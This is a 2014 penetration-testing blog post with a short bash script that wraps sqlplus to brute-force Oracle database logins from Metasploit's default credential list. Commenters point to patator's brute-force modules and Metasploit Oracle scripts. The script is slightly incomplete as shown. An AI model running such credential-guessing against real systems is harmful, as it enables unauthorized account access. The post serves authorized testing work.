Friday, October 31, 2014

Quick and Dirty Oracle Brute Forcing

Here is a quick bash script to wrap sqlplus for some brute forcing if for whatever reason nmap is failing to get the job done...and thus metasploit is failing to get the job done since the oracle_login module just calls nmap

[ ! -f $INPUT ] && { echo "$INPUT file not found"; exit 99; }
while read comment number username password hash comment
echo "string = $username:$password"
/opt/oracle/instantclient_10_2/sqlplus -L $username\/$password\@\/ORCL
done < $INPUT

What this will do is use the default oracle username/password list that ships with metasploit, parse that csv, and shove the username and password into the sqlplus command.  If you guess one right the script will hang with you logged in with the guessed account.




Andriy said...

hi, i realy recomend check patator bruteforcer

* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup : Enumerate valid users using Finger
* http_fuzz : Brute-force HTTP/HTTPS
* pop_login : Brute-force POP
* pop_passd : Brute-force poppassd (not POP3)
* imap_login : Brute-force IMAP
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* smb_lookupsid : Brute-force SMB SID-lookup
* rlogin_login : Brute-force rlogin
* vmauthd_login : Brute-force VMware Authentication Daemon
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* mysql_query : Brute-force MySQL queries
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Brute-force DNS
* dns_reverse : Brute-force DNS (reverse lookup subnets)
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
* umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes

Anonymous said...

There are actually two oracle_logins for metasploit, one that uses nmap and one that uses oci8. The rc scripts I wrote help with brute forcing alot (run (with db connected) scripts/resource/oracle_tns first, then oracle_sids, then oracle_login). Since submitting those, I made some modifications to them that allow you to set a global variable to define the networks/hosts to scan or otherwise filter things, but never bothered to push them as the submit process is kinda painful now.

Anonymous said...

nmap Oracle brute force script library (tns.lua) has a bug. He try to connect to Oracle using SERVICE_NAME, however, input paramater named SID.